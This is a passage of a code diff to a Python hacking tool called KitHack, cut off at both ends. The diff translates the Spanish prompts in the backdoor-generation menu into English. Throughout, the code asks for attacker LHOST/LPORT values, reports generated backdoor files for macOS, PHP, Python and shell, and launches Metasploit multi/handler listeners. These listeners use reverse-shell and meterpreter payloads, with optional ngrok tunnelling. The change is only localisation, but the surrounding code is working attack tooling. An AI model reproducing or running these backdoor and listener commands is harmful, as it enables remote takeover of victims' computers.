print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3625,7 +3615,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3633,30 +3623,30 @@ def main(): location = os.getcwd() if os.stat('output/{}.macho'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -3673,7 +3663,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3681,24 +3671,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.php'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3706,7 +3696,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3714,24 +3704,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.php'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3739,7 +3729,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3747,31 +3737,31 @@ def main(): location = os.getcwd() if os.stat('output/{}.php'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/reverse_php; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD php/reverse_php; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -3792,7 +3782,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3800,24 +3790,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.py'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3825,7 +3815,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3833,24 +3823,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.py'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3858,7 +3848,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3866,24 +3856,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.py'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3891,7 +3881,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3899,24 +3889,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.py'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3924,7 +3914,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3932,24 +3922,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.py'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3957,7 +3947,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3965,24 +3955,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.py'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -3990,7 +3980,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -3998,31 +3988,31 @@ def main(): location = os.getcwd() if os.stat('output/{}.py'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_udp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_udp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -4038,7 +4028,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -4046,24 +4036,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.sh'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -4071,7 +4061,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -4079,31 +4069,31 @@ def main(): location = os.getcwd() if os.stat('output/{}.sh'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to 